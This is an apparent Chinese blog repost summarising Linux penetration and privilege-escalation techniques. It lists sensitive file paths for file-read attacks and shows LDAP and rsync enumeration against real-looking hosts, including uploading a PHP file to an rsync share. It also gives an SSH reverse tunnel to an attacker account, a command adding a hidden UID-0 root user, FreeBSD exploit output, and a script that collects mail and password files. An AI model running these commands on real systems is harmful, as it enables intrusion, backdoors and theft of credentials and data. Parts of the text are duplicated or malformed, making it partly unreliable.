zoukankan      html  css  js  c++  java
  • LINUX渗透与提权总结

    本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。

    Linux 系统下的一些常见路径:

    001 /etc/passwd
    002  
    003 /etc/shadow
    004  
    005 /etc/fstab
    006  
    007 /etc/host.conf
    008  
    009 /etc/motd
    010  
    011 /etc/ld.so.conf
    012  
    013 /var/www/htdocs/index.php
    014  
    015 /var/www/conf/httpd.conf
    016  
    017 /var/www/htdocs/index.html
    018  
    019 /var/httpd/conf/php.ini
    020  
    021 /var/httpd/htdocs/index.php
    022  
    023 /var/httpd/conf/httpd.conf
    024  
    025 /var/httpd/htdocs/index.html
    026  
    027 /var/httpd/conf/php.ini
    028  
    029 /var/www/index.html
    030  
    031 /var/www/index.php
    032  
    033 /opt/www/conf/httpd.conf
    034  
    035 /opt/www/htdocs/index.php
    036  
    037 /opt/www/htdocs/index.html
    038  
    039 /usr/local/apache/htdocs/index.html
    040  
    041 /usr/local/apache/htdocs/index.php
    042  
    043 /usr/local/apache2/htdocs/index.html
    044  
    045 /usr/local/apache2/htdocs/index.php
    046  
    047 /usr/local/httpd2.2/htdocs/index.php
    048  
    049 /usr/local/httpd2.2/htdocs/index.html
    050  
    051 /tmp/apache/htdocs/index.html
    052  
    053 /tmp/apache/htdocs/index.php
    054  
    055 /etc/httpd/htdocs/index.php
    056  
    057 /etc/httpd/conf/httpd.conf
    058  
    059 /etc/httpd/htdocs/index.html
    060  
    061 /www/php/php.ini
    062  
    063 /www/php4/php.ini
    064  
    065 /www/php5/php.ini
    066  
    067 /www/conf/httpd.conf
    068  
    069 /www/htdocs/index.php
    070  
    071 /www/htdocs/index.html
    072  
    073 /usr/local/httpd/conf/httpd.conf
    074  
    075 /apache/apache/conf/httpd.conf
    076  
    077 /apache/apache2/conf/httpd.conf
    078  
    079 /etc/apache/apache.conf
    080  
    081 /etc/apache2/apache.conf
    082  
    083 /etc/apache/httpd.conf
    084  
    085 /etc/apache2/httpd.conf
    086  
    087 /etc/apache2/vhosts.d/00_default_vhost.conf
    088  
    089 /etc/apache2/sites-available/default
    090  
    091 /etc/phpmyadmin/config.inc.php
    092  
    093 /etc/mysql/my.cnf
    094  
    095 /etc/httpd/conf.d/php.conf
    096  
    097 /etc/httpd/conf.d/httpd.conf
    098  
    099 /etc/httpd/logs/error_log
    100  
    101 /etc/httpd/logs/error.log
    102  
    103 /etc/httpd/logs/access_log
    104  
    105 /etc/httpd/logs/access.log
    106  
    107 /home/apache/conf/httpd.conf
    108  
    109 /home/apache2/conf/httpd.conf
    110  
    111 /var/log/apache/error_log
    112  
    113 /var/log/apache/error.log
    114  
    115 /var/log/apache/access_log
    116  
    117 /var/log/apache/access.log
    118  
    119 /var/log/apache2/error_log
    120  
    121 /var/log/apache2/error.log
    122  
    123 /var/log/apache2/access_log
    124  
    125 /var/log/apache2/access.log
    126  
    127 /var/www/logs/error_log
    128  
    129 /var/www/logs/error.log
    130  
    131 /var/www/logs/access_log
    132  
    133 /var/www/logs/access.log
    134  
    135 /usr/local/apache/logs/error_log
    136  
    137 /usr/local/apache/logs/error.log
    138  
    139 /usr/local/apache/logs/access_log
    140  
    141 /usr/local/apache/logs/access.log
    142  
    143 /var/log/error_log
    144  
    145 /var/log/error.log
    146  
    147 /var/log/access_log
    148  
    149 /var/log/access.log
    150  
    151 /usr/local/apache/logs/access_logaccess_log.old
    152  
    153 /usr/local/apache/logs/error_logerror_log.old
    154  
    155 /etc/php.ini
    156  
    157 /bin/php.ini
    158  
    159 /etc/init.d/httpd
    160  
    161 /etc/init.d/mysql
    162  
    163 /etc/httpd/php.ini
    164  
    165 /usr/lib/php.ini
    166  
    167 /usr/lib/php/php.ini
    168  
    169 /usr/local/etc/php.ini
    170  
    171 /usr/local/lib/php.ini
    172  
    173 /usr/local/php/lib/php.ini
    174  
    175 /usr/local/php4/lib/php.ini
    176  
    177 /usr/local/php4/php.ini
    178  
    179 /usr/local/php4/lib/php.ini
    180  
    181 /usr/local/php5/lib/php.ini
    182  
    183 /usr/local/php5/etc/php.ini
    184  
    185 /usr/local/php5/php5.ini
    186  
    187 /usr/local/apache/conf/php.ini
    188  
    189 /usr/local/apache/conf/httpd.conf
    190  
    191 /usr/local/apache2/conf/httpd.conf
    192  
    193 /usr/local/apache2/conf/php.ini
    194  
    195 /etc/php4.4/fcgi/php.ini
    196  
    197 /etc/php4/apache/php.ini
    198  
    199 /etc/php4/apache2/php.ini
    200  
    201 /etc/php5/apache/php.ini
    202  
    203 /etc/php5/apache2/php.ini
    204  
    205 /etc/php/php.ini
    206  
    207 /etc/php/php4/php.ini
    208  
    209 /etc/php/apache/php.ini
    210  
    211 /etc/php/apache2/php.ini
    212  
    213 /web/conf/php.ini
    214  
    215 /usr/local/Zend/etc/php.ini
    216  
    217 /opt/xampp/etc/php.ini
    218  
    219 /var/local/www/conf/php.ini
    220  
    221 /var/local/www/conf/httpd.conf
    222  
    223 /etc/php/cgi/php.ini
    224  
    225 /etc/php4/cgi/php.ini
    226  
    227 /etc/php5/cgi/php.ini
    228  
    229 /php5/php.ini
    230  
    231 /php4/php.ini
    232  
    233 /php/php.ini
    234  
    235 /PHP/php.ini
    236  
    237 /apache/php/php.ini
    238  
    239 /xampp/apache/bin/php.ini
    240  
    241 /xampp/apache/conf/httpd.conf
    242  
    243 /NetServer/bin/stable/apache/php.ini
    244  
    245 /home2/bin/stable/apache/php.ini
    246  
    247 /home/bin/stable/apache/php.ini
    248  
    249 /var/log/mysql/mysql-bin.log
    250  
    251 /var/log/mysql.log
    252  
    253 /var/log/mysqlderror.log
    254  
    255 /var/log/mysql/mysql.log
    256  
    257 /var/log/mysql/mysql-slow.log
    258  
    259 /var/mysql.log
    260  
    261 /var/lib/mysql/my.cnf
    262  
    263 /usr/local/mysql/my.cnf
    264  
    265 /usr/local/mysql/bin/mysql
    266  
    267 /etc/mysql/my.cnf
    268  
    269 /etc/my.cnf
    270  
    271 /usr/local/cpanel/logs
    272  
    273 /usr/local/cpanel/logs/stats_log
    274  
    275 /usr/local/cpanel/logs/access_log
    276  
    277 /usr/local/cpanel/logs/error_log
    278  
    279 /usr/local/cpanel/logs/license_log
    280  
    281 /usr/local/cpanel/logs/login_log
    282  
    283 /usr/local/cpanel/logs/stats_log
    284  
    285 /usr/local/share/examples/php4/php.ini
    286  
    287 /usr/local/share/examples/php/php.ini
    288  
    289 /usr/local/tomcat5527/bin/version.sh
    290  
    291 /usr/share/tomcat6/bin/startup.sh
    292  
    293 /usr/tomcat6/bin/startup.sh

     liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:

    1 1.cat /etc/nsswitch

    看看密码登录策略我们可以看到使用了file ldap模式

    1 2.less /etc/ldap.conf
    2  
    3 base ou=People,dc=unix-center,dc=net

    找到ou,dc,dc设置

    3.查找管理员信息

    匿名方式

    1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    有密码形式

    1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    4.查找10条用户记录

    1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    实战:

    1 1.cat /etc/nsswitch

    看看密码登录策略我们可以看到使用了file ldap模式

    1 2.less /etc/ldap.conf
    2  
    3 base ou=People,dc=unix-center,dc=net

    找到ou,dc,dc设置

    3.查找管理员信息

    匿名方式

    1 ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    有密码形式

    1 ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

    4.查找10条用户记录

    1 ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

    渗透实战:

    1.返回所有的属性

    01 ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
    02  
    03 version: 1
    04  
    05 dn: dc=ruc,dc=edu,dc=cn
    06  
    07 dc: ruc
    08  
    09 objectClass: domain
    10  
    11 dn: uid=manager,dc=ruc,dc=edu,dc=cn
    12  
    13 uid: manager
    14  
    15 objectClass: inetOrgPerson
    16  
    17 objectClass: organizationalPerson
    18  
    19 objectClass: person
    20  
    21 objectClass: top
    22  
    23 sn: manager
    24  
    25 cn: manager
    26  
    27 dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
    28  
    29 uid: superadmin
    30  
    31 objectClass: inetOrgPerson
    32  
    33 objectClass: organizationalPerson
    34  
    35 objectClass: person
    36  
    37 objectClass: top
    38  
    39 sn: superadmin
    40  
    41 cn: superadmin
    42  
    43 dn: uid=admin,dc=ruc,dc=edu,dc=cn
    44  
    45 uid: admin
    46  
    47 objectClass: inetOrgPerson
    48  
    49 objectClass: organizationalPerson
    50  
    51 objectClass: person
    52  
    53 objectClass: top
    54  
    55 sn: admin
    56  
    57 cn: admin
    58  
    59 dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
    60  
    61 uid: dcp_anonymous
    62  
    63 objectClass: top
    64  
    65 objectClass: person
    66  
    67 objectClass: organizationalPerson
    68  
    69 objectClass: inetOrgPerson
    70  
    71 sn: dcp_anonymous
    72  
    73 cn: dcp_anonymous
    2.查看基类
    1 bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

    3.查找

    001 bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
    002  
    003 version: 1
    004  
    005 dn:
    006  
    007 objectClass: top
    008  
    009 namingContexts: dc=ruc,dc=edu,dc=cn
    010  
    011 supportedExtension: 2.16.840.1.113730.3.5.7
    012  
    013 supportedExtension: 2.16.840.1.113730.3.5.8
    014  
    015 supportedExtension: 1.3.6.1.4.1.4203.1.11.1
    016  
    017 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
    018  
    019 supportedExtension: 2.16.840.1.113730.3.5.3
    020  
    021 supportedExtension: 2.16.840.1.113730.3.5.5
    022  
    023 supportedExtension: 2.16.840.1.113730.3.5.6
    024  
    025 supportedExtension: 2.16.840.1.113730.3.5.4
    026  
    027 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
    028  
    029 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
    030  
    031 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
    032  
    033 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
    034  
    035 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
    036  
    037 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
    038  
    039 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
    040  
    041 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
    042  
    043 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
    044  
    045 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
    046  
    047 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
    048  
    049 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
    050  
    051 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
    052  
    053 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
    054  
    055 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
    056  
    057 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
    058  
    059 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
    060  
    061 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
    062  
    063 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
    064  
    065 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
    066  
    067 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
    068  
    069 supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
    070  
    071 supportedExtension: 1.3.6.1.4.1.1466.20037
    072  
    073 supportedExtension: 1.3.6.1.4.1.4203.1.11.3
    074  
    075 supportedControl: 2.16.840.1.113730.3.4.2
    076  
    077 supportedControl: 2.16.840.1.113730.3.4.3
    078  
    079 supportedControl: 2.16.840.1.113730.3.4.4
    080  
    081 supportedControl: 2.16.840.1.113730.3.4.5
    082  
    083 supportedControl: 1.2.840.113556.1.4.473
    084  
    085 supportedControl: 2.16.840.1.113730.3.4.9
    086  
    087 supportedControl: 2.16.840.1.113730.3.4.16
    088  
    089 supportedControl: 2.16.840.1.113730.3.4.15
    090  
    091 supportedControl: 2.16.840.1.113730.3.4.17
    092  
    093 supportedControl: 2.16.840.1.113730.3.4.19
    094  
    095 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
    096  
    097 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
    098  
    099 supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
    100  
    101 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    102  
    103 supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
    104  
    105 supportedControl: 2.16.840.1.113730.3.4.14
    106  
    107 supportedControl: 1.3.6.1.4.1.1466.29539.12
    108  
    109 supportedControl: 2.16.840.1.113730.3.4.12
    110  
    111 supportedControl: 2.16.840.1.113730.3.4.18
    112  
    113 supportedControl: 2.16.840.1.113730.3.4.13
    114  
    115 supportedSASLMechanisms: EXTERNAL
    116  
    117 supportedSASLMechanisms: DIGEST-MD5
    118  
    119 supportedLDAPVersion: 2
    120  
    121 supportedLDAPVersion: 3
    122  
    123 vendorName: Sun Microsystems, Inc.
    124  
    125 vendorVersion: Sun-Java(tm)-System-Directory/6.2
    126  
    127 dataversion: 020090516011411
    128  
    129 netscapemdsuffix: cn=ldap://dc=webA:389
    130  
    131 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
    132  
    133 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
    134  
    135 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
    136  
    137 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
    138  
    139 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
    140  
    141 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
    142  
    143 supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
    144  
    145 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
    146  
    147 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
    148  
    149 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
    150  
    151 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
    152  
    153 supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
    154  
    155 supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
    156  
    157 supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
    158  
    159 supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
    160  
    161 supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
    162  
    163 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
    164  
    165 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
    166  
    167 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
    168  
    169 supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
    170  
    171 supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
    172  
    173 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
    174  
    175 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
    176  
    177 supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    178  
    179 supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
    180  
    181 supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
    182  
    183 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
    184  
    185 supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
    186  
    187 supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
    188  
    189 supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
    190  
    191 supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
    192  
    193 supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
    194  
    195 supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
    196  
    197 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
    198  
    199 supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
    200  
    201 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
    202  
    203 supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
    204  
    205 supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
    206  
    207 supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
    208  
    209 supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
    210  
    211 supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
    212  
    213 supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
    214  
    215 supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
    216  
    217 supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
    218  
    219 supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
    220  
    221 supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
    222  
    223 supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
    224  
    225 supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
    226  
    227 supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
     

     liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:

    列举IP:

    1 showmount -e ip

     liunx 相关提权渗透技巧总结,三、rsync渗透技巧:

    1.查看rsync服务器上的列表:

    01 rsync 210.51.X.X::
    02  
    03 finance
    04  
    05 img_finance
    06  
    07 auto
    08  
    09 img_auto
    10  
    11 html_cms
    12  
    13 img_cms
    14  
    15 ent_cms
    16  
    17 ent_img
    18  
    19 ceshi
    20  
    21 res_img
    22  
    23 res_img_c2
    24  
    25 chip
    26  
    27 chip_c2
    28  
    29 ent_icms
    30  
    31 games
    32  
    33 gamesimg
    34  
    35 media
    36  
    37 mediaimg
    38  
    39 fashion
    40  
    41 res-fashion
    42  
    43 res-fo
    44  
    45 taobao-home
    46  
    47 res-taobao-home
    48  
    49 house
    50  
    51 res-house
    52  
    53 res-home
    54  
    55 res-edu
    56  
    57 res-ent
    58  
    59 res-labs
    60  
    61 res-news
    62  
    63 res-phtv
    64  
    65 res-media
    66  
    67 home
    68  
    69 edu
    70  
    71 news
    72  
    73 res-book

    看相应的下级目录(注意一定要在目录后面添加上/)

    1 rsync 210.51.X.X::htdocs_app/
    2  
    3 rsync 210.51.X.X::auto/
    4  
    5 rsync 210.51.X.X::edu/

    2.下载rsync服务器上的配置文件

    1 rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

    3.向上更新rsync文件(成功上传,不会覆盖)

    1 rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
    2  

     liunx 相关提权渗透技巧总结,四、squid渗透技巧:

    1 nc -vv 91ri.org 80
    2  
    3 GET HTTP://www.sina.com / HTTP/1.0
    4  
    5 GET HTTP://WWW.sina.com:22 / HTTP/1.0

     liunx 相关提权渗透技巧总结,五、SSH端口转发:

    1 ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

     liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:

    确定版本:

    1 index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

    重新设置密码:

    1 index.php?option=com_user&view=reset&layout=confirm

     liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:

    1 useradd -o -u 0 nothack

     liunx 相关提权渗透技巧总结,八、freebsd本地提权:

    01 [argp@julius ~]$ uname -rsi
    02  
    03 * freebsd 7.3-RELEASE GENERIC
    04  
    05 * [argp@julius ~]$ sysctl vfs.usermount
    06  
    07 * vfs.usermount: 1
    08  
    09 * [argp@julius ~]$ id
    10  
    11 * uid=1001(argp) gid=1001(argp) groups=1001(argp)
    12  
    13 * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
    14  
    15 * [argp@julius ~]$ ./nfs_mount_ex
    16  
    17 *
    18  
    19 calling nmount()

     tar 文件夹打包:

    1、tar打包:

    1 tar -cvf /home/public_html/*.tar /home/public_html/--exclude=排除文件*.gif  排除目录 /xx/xx/*
    2  
    3 alzip打包(韩国) alzip -a D:WEB d:web*.rar

    {

    注:

    关于tar的打包方式,linux不以扩展名来决定文件类型。

    若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

    那么用这条比较好

    1 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif   排除目录 /xx/xx/*

    }

    系统信息收集:

    01 for linux:
    02  
    03 #!/bin/bash
    04  
    05 echo #######geting sysinfo####
    06  
    07 echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt
    08  
    09 echo #######basic infomation##
    10  
    11 cat /proc/meminfo
    12  
    13 echo
    14  
    15 cat /proc/cpuinfo
    16  
    17 echo
    18  
    19 rpm -qa 2>/dev/null
    20  
    21 ######stole the mail......######
    22  
    23 cp -a /var/mail /tmp/getmail 2>/dev/null
    24  
    25 echo 'u'r id is' `id`
    26  
    27 echo ###atq&crontab#####
    28  
    29 atq
    30  
    31 crontab -l
    32  
    33 echo #####about var#####
    34  
    35 set
    36  
    37 echo #####about network###
    38  
    39 ####this is then point in pentest,but i am a new bird,so u need to add some in it
    40  
    41 cat /etc/hosts
    42  
    43 hostname
    44  
    45 ipconfig -a
    46  
    47 arp -v
    48  
    49 echo ########user####
    50  
    51 cat /etc/passwd|grep -i sh
    52  
    53 echo ######service####
    54  
    55 chkconfig --list
    56  
    57 for i in {oracle,mysql,tomcat,samba,apache,ftp}
    58  
    59 cat /etc/passwd|grep -i $i
    60  
    61 done
    62  
    63 locate passwd >/tmp/password 2>/dev/null
    64  
    65 sleep 5
    66  
    67 locate password >>/tmp/password 2>/dev/null
    68  
    69 sleep 5
    70  
    71 locate conf >/tmp/sysconfig 2>dev/null
    72  
    73 sleep 5
    74  
    75 locate config >>/tmp/sysconfig 2>/dev/null
    76  
    77 sleep 5
    78  
    79 ###maybe can use "tree /"###
    80  
    81 echo ##packing up#########
    82  
    83 tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig
    84  
    85 rm -rf /tmp/getmail /tmp/password /tmp/sysconfig
     
  • 相关阅读:
    Cookie的使用(二)
    对创业者有启发的10个故事
    PHP MySQL 相关函数
    异步刷新加载脚本(转载老赵)
    全栈工程师之路中级篇之小程序开发第二章第一节小程序的模板评分星星模板
    全栈工程师之路中级篇之小程序开发第二章第二节小程序电影卡片模板
    全栈工程师之路中级篇之小程序开发第一章第三节阅读官方demo
    全栈工程师之路中级篇之小程序开发第一章第五节从px到rpx
    全栈工程师之路中级篇之小程序开发第一章第二节注册小程序和开发工具讲解
    全栈工程师之路中级篇之小程序开发第一章第四节从block盒式布局到Flex弹性布局
  • 原文地址:https://www.cnblogs.com/milantgh/p/3601783.html
Copyright © 2011-2022 走看看